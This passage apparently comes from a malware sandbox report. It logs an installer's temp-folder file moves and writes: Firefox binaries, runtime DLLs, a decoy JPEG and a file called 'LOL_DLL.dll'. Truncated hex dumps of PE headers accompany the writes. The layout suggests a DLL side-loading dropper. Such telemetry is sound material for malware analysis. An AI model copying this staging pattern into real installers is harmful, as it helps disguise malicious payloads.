C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-string-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-synch-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-synch-l1-2-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-sysinfo-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-timezone-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-core-util-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-conio-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-convert-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-environment-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-filesystem-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-heap-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-locale-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-math-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-multibyte-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-private-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-process-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-runtime-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-stdio-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-string-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-time-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\api-ms-win-crt-utility-l1-1-0.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\dependentlibs.list | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\gaddafi-sarkozy-handshake.jpg | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\LOL_DLL.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\mozglue.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\msvcp140.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\msvcr110.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\ucrtbase.dll | success or wait | 1 | 4AD4FF | MoveFileW

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp | C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\vcruntime140.dll | success or wait | 1 | 4AD4FF | MoveFileW

File Written

File Path | Offset | Length | Value | Ascii | Completion | Count | Source Address | Symbol

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile



C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp

unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp

unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile



C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp

unknown 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp

unknown 21696 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................

success or wait 1 4AACAC WriteFile



C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 bf 99 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp

unknown 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp

unknown 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp

unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp

unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

